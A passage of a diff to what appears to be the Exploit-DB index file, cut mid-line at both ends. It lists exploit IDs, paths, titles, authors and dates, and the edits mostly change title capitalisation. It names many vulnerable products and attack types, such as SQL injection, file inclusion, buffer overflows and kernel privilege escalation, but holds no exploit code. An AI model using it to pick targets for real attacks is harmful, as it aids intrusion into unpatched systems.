Injection",2009-06-15,SirGod,php,webapps,0 8963,platforms/hardware/remote/8963.txt,"Netgear DG632 Router - Authentication Bypass",2009-06-15,"Tom Neaves",hardware,remote,0 8964,platforms/hardware/dos/8964.txt,"Netgear DG632 Router - Remote Denial of Service",2009-06-15,"Tom Neaves",hardware,dos,0 @@ -8527,16 +8527,16 @@ id,file,description,date,author,platform,type,port 9040,platforms/php/webapps/9040.txt,"Joomla com_bookflip - (book_id) SQL Injection",2009-06-29,boom3rang,php,webapps,0 9041,platforms/php/webapps/9041.txt,"Audio Article Directory - (file) Remote File Disclosure",2009-06-29,"ThE g0bL!N",php,webapps,0 9042,platforms/php/webapps/9042.pl,"Newsolved 1.1.6 - (login grabber) Multiple SQL Injection",2009-06-29,jmp-esp,php,webapps,0 -9043,platforms/php/webapps/9043.txt,"WordPress Plugin DM Albums 1.9.2 - Remote File Inclusion",2009-06-29,Septemb0x,php,webapps,0 +9043,platforms/php/webapps/9043.txt,"Wordpress Plugin DM Albums 1.9.2 - Remote File Inclusion",2009-06-29,Septemb0x,php,webapps,0 9044,platforms/php/webapps/9044.txt,"dm filemanager 3.9.4 - Remote File Inclusion",2009-06-29,Septemb0x,php,webapps,0 9047,platforms/windows/local/9047.pl,"TFM MMPlayer 2.0 - (m3u/ppl) Universal Buffer Overflow (SEH)",2009-06-30,"ThE g0bL!N",windows,local,0 -9048,platforms/php/webapps/9048.txt,"WordPress Plugin DM Albums 1.9.2 - Remote File Disclosure",2009-06-30,Stack,php,webapps,0 +9048,platforms/php/webapps/9048.txt,"Wordpress Plugin DM Albums 1.9.2 - Remote File Disclosure",2009-06-30,Stack,php,webapps,0 9049,platforms/php/webapps/9049.txt,"DM FileManager 3.9.4 - Remote File Disclosure",2009-06-30,Stack,php,webapps,0 9050,platforms/php/webapps/9050.pl,"SMF Mod Member Awards 1.0.2 - Blind SQL Injection",2009-06-30,eLwaux,php,webapps,0 9051,platforms/php/webapps/9051.txt,"jax formmailer 3.0.0 - Remote File Inclusion",2009-06-30,ahmadbady,php,webapps,0 9052,platforms/php/webapps/9052.txt,"BIGACE CMS 2.6 - (cmd) Local File Inclusion",2009-06-30,CWD@rBe,php,webapps,0 9053,platforms/php/webapps/9053.txt,"phpMyBlockchecker 1.0.0055 - Insecure Cookie Handling",2009-06-30,SirGod,php,webapps,0 -9054,platforms/php/webapps/9054.txt,"WordPress Plugin Related Sites 2.1 - Blind SQL Injection",2009-06-30,eLwaux,php,webapps,0 +9054,platforms/php/webapps/9054.txt,"Wordpress Plugin Related Sites 2.1 - Blind SQL Injection",2009-06-30,eLwaux,php,webapps,0 9055,platforms/php/webapps/9055.pl,"PunBB Affiliates Mod 1.1 - Blind SQL Injection",2009-06-30,Dante90,php,webapps,0 9056,platforms/php/webapps/9056.txt,"MDPro Module CWGuestBook 2.1 - SQL Injection",2009-06-30,Dante90,php,webapps,0 9057,platforms/php/webapps/9057.txt,"tsep 0.942.02 - Multiple Vulnerabilities",2009-06-30,eLwaux,php,webapps,0 @@ -8591,7 +8591,7 @@ id,file,description,date,author,platform,type,port 9107,platforms/php/webapps/9107.txt,"Phenotype CMS 2.8 - (login.php user) Blind SQL Injection",2009-07-10,"Khashayar Fereidani",php,webapps,0 9108,platforms/windows/remote/9108.py,"Microsoft Internet Explorer 7 Video - ActiveX Remote Buffer Overflow",2009-07-10,"David Kennedy (ReL1K)",windows,remote,0 9109,platforms/php/webapps/9109.txt,"ToyLog 0.1 - SQL Injection / Remote Code Execution Exploit",2009-07-10,darkjoker,php,webapps,0 -9110,platforms/php/webapps/9110.txt,"WordPress Core & Plugins - Privileges Unchecked in admin.php / Multiple Information",2009-07-10,"Core Security",php,webapps,0 +9110,platforms/php/webapps/9110.txt,"Wordpress Core & Plugins - Privileges Unchecked in admin.php / Multiple Information",2009-07-10,"Core Security",php,webapps,0 9111,platforms/php/webapps/9111.txt,"Jobbr 2.2.7 - Multiple SQL Injections",2009-07-10,Moudi,php,webapps,0 9112,platforms/php/webapps/9112.txt,"Joomla Component com_propertylab - (auction_id) SQL Injection",2009-07-10,"Chip d3 bi0s",php,webapps,0 9113,platforms/windows/dos/9113.txt,"OtsAv DJ/TV/Radio - Multiple Local Heap Overflow PoCs",2009-07-10,Stack,windows,dos,0 @@ -8630,7 +8630,7 @@ id,file,description,date,author,platform,type,port 9147,platforms/windows/dos/9147.pl,"MixVibes Pro 7.043 - (.vib) Local Stack Overflow PoC",2009-07-14,hack4love,windows,dos,0 9148,platforms/windows/local/9148.py,"Live For Speed 2 Version Z - '.mpr' Buffer Overflow (SEH)",2009-07-14,His0k4,windows,local,0 9149,platforms/windows/local/9149.pl,"Icarus 2.0 - (.ICP) Local Buffer Overflow (SEH)",2009-07-15,hack4love,windows,local,0 -9150,platforms/php/webapps/9150.txt,"WordPress Plugin My Category Order 2.8 - SQL Injection",2009-07-15,"Manh Luat",php,webapps,0 +9150,platforms/php/webapps/9150.txt,"Wordpress Plugin My Category Order 2.8 - SQL Injection",2009-07-15,"Manh Luat",php,webapps,0 9151,platforms/php/webapps/9151.txt,"ILIAS Lms 3.9.9/3.10.7 - Arbitrary Edition/Info Disclosure Vulnerabilities",2009-07-15,YEnH4ckEr,php,webapps,0 9152,platforms/windows/local/9152.pl,"AudioPLUS 2.00.215 - (.m3u .lst) Universal SEH Overwrite",2009-07-15,Stack,windows,local,0 9153,platforms/php/webapps/9153.txt,"Admin News Tools 2.5 - (fichier) Remote File Disclosure",2009-07-15,Securitylab.ir,php,webapps,0 @@ -8679,7 +8679,7 @@ id,file,description,date,author,platform,type,port 9198,platforms/multiple/dos/9198.txt,"Real Helix DNA - RTSP and SETUP Request Handler Vulnerabilities",2009-07-17,"Core Security",multiple,dos,0 9199,platforms/windows/local/9199.txt,"Adobe 9.x Related Service - (getPlus_HelperSvc.exe) Privilege Escalation",2009-07-20,Nine:Situations:Group,windows,local,0 9200,platforms/windows/dos/9200.pl,"EpicVJ 1.2.8.0 - (.mpl/.m3u) Local Heap Overflow PoC",2009-07-20,hack4love,windows,dos,0 -9202,platforms/php/webapps/9202.txt,"Silentum Guestbook 2.0.2 - (silentum_guestbook.php) SQL Injection",2009-07-20,Bgh7,php,webapps,0 +9202,platforms/php/webapps/9202.txt,"Silentum GuestBook 2.0.2 - (silentum_guestbook.php) SQL Injection",2009-07-20,Bgh7,php,webapps,0 9203,platforms/php/webapps/9203.txt,"Netrix CMS 1.0 - Authentication Bypass",2009-07-20,Mr.tro0oqy,php,webapps,0 9204,platforms/php/webapps/9204.txt,"MiniCWB 2.3.0 - (LANG) Remote File Inclusion",2009-07-20,NoGe,php,webapps,0 9205,platforms/php/webapps/9205.txt,"mcshoutbox 1.1 - (SQL Injection / Cross-Site Scripting / shell) Multiple Vulnerabilities",2009-07-20,SirGod,php,webapps,0 @@ -8719,10 +8719,10 @@ id,file,description,date,author,platform,type,port 9244,platforms/php/webapps/9244.txt,"Joomla Extension UIajaxIM 1.1 - JavaScript Execution",2009-07-24,"599eme Man",php,webapps,0 40297,platforms/windows/local/40297.py,"NScan 0.9.1 - (Target) Buffer Overflow",2016-08-29,hyp3rlinx,windows,local,0 9246,platforms/php/webapps/9246.txt,"Basilic 1.5.13 - (index.php idAuthor) SQL Injection",2009-07-24,NoGe,php,webapps,0 -9247,platforms/osx/remote/9247.py,"Mozilla Firefox 3.5 - (Font tags) Remote Buffer Overflow (osx)",2009-07-24,Dr_IDE,osx,remote,0 +9247,platforms/osx/remote/9247.py,"Mozilla Firefox 3.5 (OSX) - (Font tags) Remote Buffer Overflow",2009-07-24,Dr_IDE,osx,remote,0 9248,platforms/php/webapps/9248.txt,"SaphpLesson 4.0 - (Authentication Bypass) SQL Injection",2009-07-24,SwEET-DeViL,php,webapps,0 9249,platforms/php/webapps/9249.txt,"XOOPS Celepar Module Qas - (codigo) SQL Injection",2009-07-24,s4r4d0,php,webapps,0 -9250,platforms/php/webapps/9250.sh,"WordPress 2.8.1 - (url) Cross-Site Scripting Exploit",2009-07-24,superfreakaz0rz,php,webapps,0 +9250,platforms/php/webapps/9250.sh,"Wordpress 2.8.1 - (url) Cross-Site Scripting Exploit",2009-07-24,superfreakaz0rz,php,webapps,0 9251,platforms/php/webapps/9251.txt,"Deonixscripts Templates Management 1.3 - SQL Injection",2009-07-24,d3b4g,php,webapps,0 9252,platforms/php/webapps/9252.txt,"Scripteen Free Image Hosting Script 2.3 - SQL Injection",2009-07-24,Coksnuss,php,webapps,0 9253,platforms/windows/dos/9253.html,"Microsoft Internet Explorer 7/8 - findText Unicode Parsing Crash Exploit",2009-07-24,Hong10,windows,dos,0 @@ -8764,7 +8764,7 @@ id,file,description,date,author,platform,type,port 9290,platforms/php/webapps/9290.txt,"In-Portal 4.3.1 - Arbitrary File Upload",2009-07-28,Mr.tro0oqy,php,webapps,0 9291,platforms/windows/local/9291.pl,"MP3 Studio 1.0 - (.mpf) Local Buffer Overflow Exploit (SEH)",2009-07-28,Koshi,windows,local,0 9292,platforms/php/webapps/9292.txt,"PaoLink 1.0 - (login_ok) Authentication Bypass",2009-07-28,SirGod,php,webapps,0 -9293,platforms/php/webapps/9293.txt,"PaoBacheca Guestbook 2.1 - (login_ok) Authentication Bypass",2009-07-28,SirGod,php,webapps,0 +9293,platforms/php/webapps/9293.txt,"PaoBacheca GuestBook 2.1 - (login_ok) Authentication Bypass",2009-07-28,SirGod,php,webapps,0 9294,platforms/php/webapps/9294.txt,"PaoLiber 1.1 - (login_ok) Authentication Bypass",2009-07-28,SirGod,php,webapps,0 9295,platforms/windows/dos/9295.txt,"Firebird SQL - op_connect_request main listener shutdown",2009-07-28,"Core Security",windows,dos,0 9296,platforms/php/webapps/9296.txt,"TinyBrowser (TinyMCE Editor File browser) 1.41.6 - Multiple Vulnerabilities",2009-07-28,"Aung Khant",php,webapps,0 @@ -8849,7 +8849,7 @@ id,file,description,date,author,platform,type,port 9376,platforms/windows/dos/9376.py,"jetAudio 7.5.5 plus vx - (M3U/ASX/WAX/WVX) Local Crash PoC",2009-09-10,Dr_IDE,windows,dos,0 9377,platforms/windows/local/9377.pl,"A2 Media Player Pro 2.51 - (.m3u /m3l) Universal Local Buffer Overflow Exploit (SEH)",2009-08-06,hack4love,windows,local,0 9378,platforms/php/webapps/9378.txt,"PHP Script Forum Hoster - (Topic Delete / Cross-Site Scripting) Multiple Vulnerabilities",2009-08-06,int_main();,php,webapps,0 -9379,platforms/windows/local/9379.pl,"Playlistmaker 1.5 - (.M3U/M3L) Local Stack Overflow (seh)",2009-08-06,germaya_x,windows,local,0 +9379,platforms/windows/local/9379.pl,"Playlistmaker 1.5 - (.M3U/M3L) Local Stack Overflow (SEH)",2009-08-06,germaya_x,windows,local,0 9380,platforms/php/webapps/9380.txt,"TYPO3 CMS 4.0 - (showUid) SQL Injection",2009-08-06,Ro0T-MaFia,php,webapps,0 9381,platforms/windows/dos/9381.py,"Groovy Media Player 1.2.0 - '.m3u' Local Buffer Overflow PoC",2009-08-06,"opt!x hacker",windows,dos,0 9382,platforms/windows/dos/9382.txt,"ImTOO MPEG Encoder 3.1.53 - (.cue/.m3u) Local Buffer Overflow PoC",2009-08-06,"opt!x hacker",windows,dos,0 @@ -8876,7 +8876,7 @@ id,file,description,date,author,platform,type,port 9407,platforms/php/webapps/9407.txt,"CMS Made Simple 1.6.2 - Local File Disclosure",2009-08-10,IHTeam,php,webapps,0 9408,platforms/php/webapps/9408.php,"Joomla Component Kunena Forums (com_kunena) - Blind SQL Injection",2009-08-10,"ilker Kandemir",php,webapps,0 9409,platforms/windows/local/9409.pl,"MediaCoder 0.7.1.4490 - (.lst/.m3u) Universal Buffer Overflow Exploit (SEH)",2009-08-10,hack4love,windows,local,0 -9410,platforms/php/webapps/9410.txt,"WordPress 2.8.3 - Remote Admin Reset Password",2009-08-11,"laurent gaffié ",php,webapps,0 +9410,platforms/php/webapps/9410.txt,"Wordpress 2.8.3 - Remote Admin Reset Password",2009-08-11,"laurent gaffié ",php,webapps,0 9411,platforms/windows/dos/9411.cpp,"Embedthis Appweb 3.0b.2-4 - Remote Buffer Overflow PoC",2009-08-11,"fl0 fl0w",windows,dos,0 9412,platforms/windows/local/9412.pl,"Easy Music Player 1.0.0.2 - (wav) Universal Local Buffer Exploit (SEH)",2009-08-11,ahwak2000,windows,local,0 9413,platforms/php/webapps/9413.txt,"Joomla Component idoblog 1.1b30 (com_idoblog) - SQL Injection",2009-08-11,kkr,php,webapps,0 @@ -8895,7 +8895,7 @@ id,file,description,date,author,platform,type,port 9428,platforms/windows/local/9428.pl,"pIPL 2.5.0 - (.PLS /.PL) Universal Local Buffer Exploit (SEH)",2009-08-13,hack4love,windows,local,0 9429,platforms/windows/dos/9429.py,"EmbedThis Appweb 3.0B.2-4 - Multiple Remote Buffer Overflow PoC",2009-08-13,Dr_IDE,windows,dos,0 9430,platforms/php/webapps/9430.pl,"JBLOG 1.5.1 - SQL Table Backup Exploit",2009-08-13,Ams,php,webapps,0 -9431,platforms/php/webapps/9431.txt,"WordPress Plugin WP-Syntax 0.9.1 - Remote Command Execution",2009-08-27,Raz0r,php,webapps,0 +9431,platforms/php/webapps/9431.txt,"Wordpress Plugin WP-Syntax 0.9.1 - Remote Command Execution",2009-08-27,Raz0r,php,webapps,0 9432,platforms/hardware/remote/9432.txt,"THOMSON ST585 - (user.ini) Arbitrary Download",2009-08-13,"aBo MoHaMeD",hardware,remote,0 9433,platforms/php/webapps/9433.txt,"Gazelle CMS 1.0 - Arbitrary File Upload",2009-08-13,RoMaNcYxHaCkEr,php,webapps,0 9434,platforms/php/webapps/9434.txt,"tgs CMS 0.x - (Cross-Site Scripting / SQL Injection / File Disclosure) Multiple Vulnerabilities",2009-08-13,[]ViZiOn,php,webapps,0 @@ -9007,7 +9007,7 @@ id,file,description,date,author,platform,type,port 9542,platforms/linux/local/9542.c,"Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 x86) - 'ip_append_data()' ring0 Root Exploit (1)",2009-08-31,"INetCop Security",linux,local,0 9543,platforms/linux/local/9543.c,"Linux Kernel < 2.6.31-rc7 - 'AF_IRDA' 29-Byte Stack Disclosure Exploit (2)",2009-08-31,"Jon Oberheide",linux,local,0 9544,platforms/php/webapps/9544.txt,"Modern Script 5.0 - (index.php s) SQL Injection",2009-08-31,Red-D3v1L,php,webapps,0 -9545,platforms/linux/local/9545.c,"Linux Kernel 2.4.x / 2.6.x (CentOS 4.8/5.3 / RHEL 4.8/5.3 / SUSE 10 SP2/11 / Ubuntu 8.10) (PPC) - 'sock_sendpage()' Privilege Escalation",2009-08-31,"Ramon Valle",linux,local,0 +9545,platforms/linux/local/9545.c,"Linux Kernel 2.4.x / 2.6.x (CentOS 4.8/5.3 / RHEL 4.8/5.3 / SuSE 10 SP2/11 / Ubuntu 8.10) (PPC) - 'sock_sendpage()' Privilege Escalation",2009-08-31,"Ramon Valle",linux,local,0 9546,platforms/windows/dos/9546.pl,"Swift Ultralite 1.032 - '.m3u' Local Buffer Overflow PoC",2009-08-31,hack4love,windows,dos,0 9547,platforms/windows/dos/9547.pl,"SolarWinds TFTP Server 9.2.0.111 - Remote Denial of Service",2009-08-31,"Gaurav Baruah",windows,dos,0 9548,platforms/windows/local/9548.pl,"Ultimate Player 1.56b - (.m3u/upl) Universal Local Buffer Overflow Exploit (SEH)",2009-08-31,hack4love,windows,local,0 @@ -9066,7 +9066,7 @@ id,file,description,date,author,platform,type,port 9603,platforms/php/webapps/9603.txt,"Model Agency Manager Pro - (user_id) SQL Injection",2009-09-09,R3d-D3V!L,php,webapps,0 9604,platforms/php/webapps/9604.txt,"Joomla Component com_joomloc - 'id' SQL Injection",2009-09-09,"Chip d3 bi0s",php,webapps,0 9605,platforms/php/webapps/9605.pl,"Agoko CMS 0.4 - Remote Command Execution Exploit",2009-09-09,StAkeR,php,webapps,0 -9606,platforms/windows/dos/9606.pl,"Safari 3.2.3 - (Win32) JavaScript (eval) Remote Denial of Service",2009-09-09,"Jeremy Brown",windows,dos,0 +9606,platforms/windows/dos/9606.pl,"Safari 3.2.3 (Windows/x86) - JavaScript (eval) Remote Denial of Service",2009-09-09,"Jeremy Brown",windows,dos,0 9607,platforms/windows/dos/9607.pl,"Ipswitch WS_FTP 12 Professional - Remote Format String PoC",2009-09-09,"Jeremy Brown",windows,dos,0 9608,platforms/linux/local/9608.c,"GemStone/S 6.3.1 - (stoned) Local Buffer Overflow",2009-09-09,"Jeremy Brown",linux,local,0 9609,platforms/php/webapps/9609.txt,"Mambo Component com_hestar - SQL Injection",2009-09-09,M3NW5,php,webapps,0 @@ -9094,7 +9094,7 @@ id,file,description,date,author,platform,type,port 9633,platforms/php/webapps/9633.txt,"Bus Script - (sitetext_id) SQL Injection",2009-09-10,Mr.SQL,php,webapps,0 9634,platforms/php/webapps/9634.txt,"Adult Portal escort listing - (user_id) SQL Injection",2009-09-10,Mr.SQL,php,webapps,0 9635,platforms/php/webapps/9635.txt,"Drunken:Golem Gaming Portal - (admin_news_bot.php) Remote File Inclusion",2009-09-10,"EA Ngel",php,webapps,0 -9636,platforms/php/webapps/9636.txt,"An image gallery 1.0 - (navigation.php) Local Directory Traversal",2009-09-10,"ThE g0bL!N",php,webapps,0 +9636,platforms/php/webapps/9636.txt,"An image Gallery 1.0 - (navigation.php) Local Directory Traversal",2009-09-10,"ThE g0bL!N",php,webapps,0 9637,platforms/php/webapps/9637.txt,"T-HTB Manager 0.5 - Multiple Blind SQL Injection",2009-09-10,"Salvatore Fresta",php,webapps,0 9638,platforms/windows/remote/9638.txt,"Kolibri+ Webserver 2 - Source Code Disclosure",2009-09-11,SkuLL-HackeR,windows,remote,0 9639,platforms/php/webapps/9639.txt,"Image voting 1.0 - (index.php show) SQL Injection",2009-09-11,SkuLL-HackeR,php,webapps,0 @@ -9156,7 +9156,7 @@ id,file,description,date,author,platform,type,port 9697,platforms/php/webapps/9697.txt,"Joomla com_foobla_suggestions (idea_id) 1.5.11 - SQL Injection",2009-09-16,"Chip d3 bi0s",php,webapps,0 9698,platforms/php/webapps/9698.pl,"Joomla Component com_jlord_rss - 'id' Blind SQL Injection",2009-09-16,"Chip d3 bi0s",php,webapps,0 9699,platforms/php/webapps/9699.txt,"microcms 3.5 - (SQL Injection / Local File Inclusion) Multiple Vulnerabilities",2009-09-16,"learn3r hacker",php,webapps,0 -9700,platforms/php/webapps/9700.rb,"Saphplesson 4.3 - Blind SQL Injection",2009-09-16,"Jafer Al Zidjali",php,webapps,0 +9700,platforms/php/webapps/9700.rb,"SaphpLesson 4.3 - Blind SQL Injection",2009-09-16,"Jafer Al Zidjali",php,webapps,0 9701,platforms/windows/dos/9701.c,"Notepad++ 5.4.5 - Local .C/CPP Stack Buffer Overflow PoC",2009-09-16,"fl0 fl0w",windows,dos,0 9702,platforms/php/webapps/9702.txt,"Elite Gaming Ladders 3.2 - (platform) SQL Injection",2009-09-16,snakespc,php,webapps,0 9703,platforms/php/webapps/9703.txt,"phpPollScript 1.3 - (include_class) Remote File Inclusion",2009-09-16,"cr4wl3r ",php,webapps,0 @@ -9185,7 +9185,7 @@ id,file,description,date,author,platform,type,port 9727,platforms/multiple/webapps/9727.txt,"CMScontrol (Content Management Portal Solutions) - SQL Injection",2009-09-21,ph1l1ster,multiple,webapps,0 9728,platforms/multiple/webapps/9728.txt,"ProdLer 2.0 - Remote File Inclusion",2009-09-21,"cr4wl3r ",multiple,webapps,0 9729,platforms/multiple/webapps/9729.txt,"Loggix Project 9.4.5 - Multiple Remote File Inclusion",2009-09-21,"cr4wl3r ",multiple,webapps,0 -9730,platforms/multiple/webapps/9730.txt,"WX Guestbook 1.1.208 - SQL Injection / Persistent Cross-Site Scripting",2009-09-21,learn3r,multiple,webapps,0 +9730,platforms/multiple/webapps/9730.txt,"WX GuestBook 1.1.208 - SQL Injection / Persistent Cross-Site Scripting",2009-09-21,learn3r,multiple,webapps,0 9731,platforms/multiple/dos/9731.txt,"Snort unified 1 IDS Logging - Alert Evasion & Logfile Corruption/Alert Falsify",2009-09-21,"Pablo Rincón Crespo",multiple,dos,0 9732,platforms/multiple/webapps/9732.txt,"Joomla component com_jinc 0.2 - (newsid) Blind SQL Injection",2009-09-21,"Chip d3 bi0s",multiple,webapps,0 9733,platforms/multiple/webapps/9733.pl,"Joomla component com_mytube (user_id) 1.0 Beta - Blind SQL Injection",2009-09-21,"Chip d3 bi0s",multiple,webapps,0 @@ -9259,7 +9259,7 @@ id,file,description,date,author,platform,type,port 9874,platforms/windows/dos/9874.txt,"Cherokee Web server 0.5.4 - Denial of Service",2009-10-26,"Usman Saeed",windows,dos,0 9875,platforms/php/webapps/9875.txt,"CubeCart 4 - Session Management Bypass",2009-10-30,"Bogdan Calin",php,webapps,0 9876,platforms/php/webapps/9876.txt,"DedeCMS 5.1 - SQL Injection",2009-10-14,"Securitylab Security Research",php,webapps,0 -9877,platforms/asp/webapps/9877.txt,"DWebPro - command Injection",2009-10-17,"Rafael Sousa",asp,webapps,0 +9877,platforms/asp/webapps/9877.txt,"DWebPro - Command Injection",2009-10-17,"Rafael Sousa",asp,webapps,0 9879,platforms/windows/dos/9879.txt,"EMC RepliStor Server 6.3.1.3 - Denial of Service",2009-10-20,"bellick ",windows,dos,7144 9880,platforms/php/webapps/9880.txt,"Endonesia CMS 8.4 - Local File Inclusion",2009-11-04,s4r4d0,php,webapps,0 9881,platforms/windows/dos/9881.txt,"Eureka Mail Client 2.2q - PoC Buffer Overflow",2009-10-23,"Francis Provencher",windows,dos,110 @@ -9270,7 +9270,7 @@ id,file,description,date,author,platform,type,port 9887,platforms/jsp/webapps/9887.txt,"jetty 6.x < 7.x - Cross-Site Scripting / Information Disclosure / Injection",2009-10-26,"Antonion Parata",jsp,webapps,0 9888,platforms/php/webapps/9888.txt,"Joomla Ajax Chat 1.0 - Remote File Inclusion",2009-10-19,kaMtiEz,php,webapps,0 9889,platforms/php/webapps/9889.txt,"Joomla Book Library 1.0 - File Inclusion",2009-10-19,kaMtiEz,php,webapps,0 -9890,platforms/php/webapps/9890.txt,"Joomla JD-WordPress 2.0 RC2 - Remote file icnlusion",2009-10-19,"Don Tukulesto",php,webapps,0 +9890,platforms/php/webapps/9890.txt,"Joomla JD-Wordpress 2.0 RC2 - Remote file icnlusion",2009-10-19,"Don Tukulesto",php,webapps,0 9891,platforms/php/webapps/9891.txt,"Joomla Jshop - SQL Injection",2009-10-23,"Don Tukulesto",php,webapps,0 9892,platforms/php/webapps/9892.txt,"Joomla Photo Blog alpha 3 - alpha 3a SQL Injection",2009-10-23,kaMtiEz,php,webapps,0 9893,platforms/windows/remote/9893.txt,"Microsoft Internet Explorer 5/6/7 - Memory Corruption PoC",2009-10-15,Skylined,windows,remote,80 @@ -9295,20 +9295,20 @@ id,file,description,date,author,platform,type,port 9914,platforms/unix/remote/9914.rb,"SpamAssassin spamd 3.1.3 - Command Injection (Metasploit)",2006-06-06,patrick,unix,remote,783 9915,platforms/multiple/remote/9915.rb,"DistCC Daemon - Command Execution (Metasploit)",2002-02-01,"H D Moore",multiple,remote,3632 9916,platforms/multiple/webapps/9916.rb,"ContentKeeper Web Appliance < 125.10 - Command Execution (Metasploit)",2009-02-25,patrick,multiple,webapps,0 -9917,platforms/solaris/remote/9917.rb,"Solaris in.telnetd TTYPROMPT - Buffer Overflow (Metasploit)",2002-01-18,MC,solaris,remote,23 +9917,platforms/solaris/remote/9917.rb,"Solaris in.TelnetD TTYPROMPT - Buffer Overflow (Metasploit)",2002-01-18,MC,solaris,remote,23 9918,platforms/solaris/remote/9918.rb,"Solaris 10 / 11 Telnet - Remote Authentication Bypass (Metasploit)",2007-02-12,MC,solaris,remote,23 9920,platforms/solaris/remote/9920.rb,"Solaris sadmind adm_build_path - Buffer Overflow (Metasploit)",2008-10-14,"Adriano Lima",solaris,remote,111 9921,platforms/solaris/remote/9921.rb,"Solaris 8.0 - LPD Command Execution (Metasploit)",2001-08-31,"H D Moore",solaris,remote,515 9922,platforms/php/webapps/9922.txt,"Oscailt CMS 3.3 - Local File Inclusion",2009-10-28,s4r4d0,php,webapps,0 9923,platforms/solaris/remote/9923.rb,"Solaris 8 dtspcd - Heap Overflow (Metasploit)",2002-06-10,noir,solaris,remote,6112 -9924,platforms/osx/remote/9924.rb,"Samba 2.2.0 < 2.2.8 - trans2open Overflow (OS X) (Metasploit)",2003-04-07,"H D Moore",osx,remote,139 -9925,platforms/osx/remote/9925.rb,"Apple Quicktime RTSP 10.4.0 - 10.5.0 Content-Type Overflow (OS X) (Metasploit)",2009-10-28,anonymous,osx,remote,0 +9924,platforms/osx/remote/9924.rb,"Samba 2.2.0 < 2.2.8 (OSX) - trans2open Overflow (Metasploit)",2003-04-07,"H D Moore",osx,remote,139 +9925,platforms/osx/remote/9925.rb,"Apple Quicktime RTSP 10.4.0 < 10.5.0 (OSX) - Content-Type Overflow (Metasploit)",2009-10-28,anonymous,osx,remote,0 9926,platforms/php/webapps/9926.rb,"Joomla 1.5.12 - tinybrowser Remote File Upload / Execute",2009-07-22,spinbad,php,webapps,0 -9927,platforms/osx/remote/9927.rb,"mDNSResponder 10.4.0 / 10.4.8 - UPnP Location Overflow (OS X) (Metasploit)",2009-10-28,anonymous,osx,remote,0 -9928,platforms/osx/remote/9928.rb,"WebSTAR FTP Server 5.3.2 - USER Overflow (OS X) (Metasploit)",2004-07-13,ddz,osx,remote,21 -9929,platforms/osx/remote/9929.rb,"Mail.App 10.5.0 - Image Attachment Command Execution (OS X) (Metasploit)",2006-03-01,"H D Moore",osx,remote,25 -9930,platforms/osx/remote/9930.rb,"Arkeia Backup Client 5.3.3 - Type 77 Overflow (OS X) (Metasploit)",2005-02-18,"H D Moore",osx,remote,0 -9931,platforms/osx/remote/9931.rb,"AppleFileServer 10.3.3 - LoginEXT PathName Overflow (OS X) (Metasploit)",2004-03-03,"H D Moore",osx,remote,548 +9927,platforms/osx/remote/9927.rb,"mDNSResponder 10.4.0 / 10.4.8 (OSX) - UPnP Location Overflow (Metasploit)",2009-10-28,anonymous,osx,remote,0 +9928,platforms/osx/remote/9928.rb,"WebSTAR FTP Server 5.3.2 (OSX) - USER Overflow (Metasploit)",2004-07-13,ddz,osx,remote,21 +9929,platforms/osx/remote/9929.rb,"Mail.App 10.5.0 (OSX) - Image Attachment Command Execution (Metasploit)",2006-03-01,"H D Moore",osx,remote,25 +9930,platforms/osx/remote/9930.rb,"Arkeia Backup Client 5.3.3 (OSX) - Type 77 Overflow (Metasploit)",2005-02-18,"H D Moore",osx,remote,0 +9931,platforms/osx/remote/9931.rb,"AppleFileServer 10.3.3 (OSX) - LoginEXT PathName Overflow (Metasploit)",2004-03-03,"H D Moore",osx,remote,548 9932,platforms/novell/remote/9932.rb,"Novell NetWare 6.5 SP2-SP7 - LSASS CIFS.NLM Overflow (Metasploit)",2007-01-21,toto,novell,remote,0 9933,platforms/php/webapps/9933.txt,"PHP168 6.0 - Command Execution",2009-10-28,"Securitylab Security Research",php,webapps,0 9934,platforms/multiple/remote/9934.rb,"Wyse Rapport Hagent Fake Hserver - Command Execution (Metasploit)",2009-07-10,kf,multiple,remote,0 @@ -9453,9 +9453,9 @@ id,file,description,date,author,platform,type,port 10084,platforms/windows/local/10084.txt,"Quick Heal 10.00 SP1 - Privilege Escalation",2009-10-13,"Maxim A. Kulakov",windows,local,0 10085,platforms/jsp/webapps/10085.txt,"toutvirtual virtualiq pro 3.2 - Multiple Vulnerabilities",2009-11-07,"Alberto Trivero",jsp,webapps,0 10086,platforms/multiple/remote/10086.txt,"WebKit - 'Document()' Function Remote Information Disclosure",2009-11-12,"Chris Evans",multiple,remote,0 -10088,platforms/php/webapps/10088.txt,"WordPress 2.0 - 2.7.1 admin.php Module Configuration Security Bypass",2009-11-10,"Fernando Arnaboldi",php,webapps,0 -10089,platforms/php/webapps/10089.txt,"WordPress 2.8.5 - Unrestricted File Upload Arbitrary PHP Code Execution",2009-11-11,"Dawid Golunski",php,webapps,0 -10090,platforms/php/webapps/10090.txt,"WordPress MU 1.2.2 < 1.3.1 - 'wp-includes/wpmu-functions.php' Cross-Site Scripting",2009-11-10,"Juan Galiana Lara",php,webapps,0 +10088,platforms/php/webapps/10088.txt,"Wordpress 2.0 - 2.7.1 admin.php Module Configuration Security Bypass",2009-11-10,"Fernando Arnaboldi",php,webapps,0 +10089,platforms/php/webapps/10089.txt,"Wordpress 2.8.5 - Unrestricted File Upload Arbitrary PHP Code Execution",2009-11-11,"Dawid Golunski",php,webapps,0 +10090,platforms/php/webapps/10090.txt,"Wordpress MU 1.2.2 < 1.3.1 - 'wp-includes/wpmu-functions.php' Cross-Site Scripting",2009-11-10,"Juan Galiana Lara",php,webapps,0 10091,platforms/windows/dos/10091.txt,"XLPD 3.0 - Remote Denial of Service",2009-10-06,"Francis Provencher",windows,dos,515 10092,platforms/windows/dos/10092.txt,"Yahoo! Messenger 9.0.0.2162 - 'YahooBridgeLib.dll' ActiveX Control Remote Denial of Service",2009-11-12,HACKATTACK,windows,dos,0 10093,platforms/multiple/remote/10093.txt,"Adobe Shockwave 11.5.1.601 Player - Multiple Code Execution",2009-11-04,"Francis Provencher",multiple,remote,0 @@ -9467,12 +9467,12 @@ id,file,description,date,author,platform,type,port 10099,platforms/windows/remote/10099.py,"HP Power Manager Administration - Universal Buffer Overflow",2009-11-16,ryujin,windows,remote,80 10100,platforms/windows/dos/10100.py,"FTPDMIN 0.96 - (LIST) Remote Denial of Service",2007-03-20,shinnai,windows,dos,21 10101,platforms/php/webapps/10101.txt,"telepark wiki 2.4.23 - Multiple Vulnerabilities",2009-11-16,Abysssec,php,webapps,0 -10102,platforms/windows/dos/10102.pl,"Safari 4.0.3 - (Win32) CSS Remote Denial of 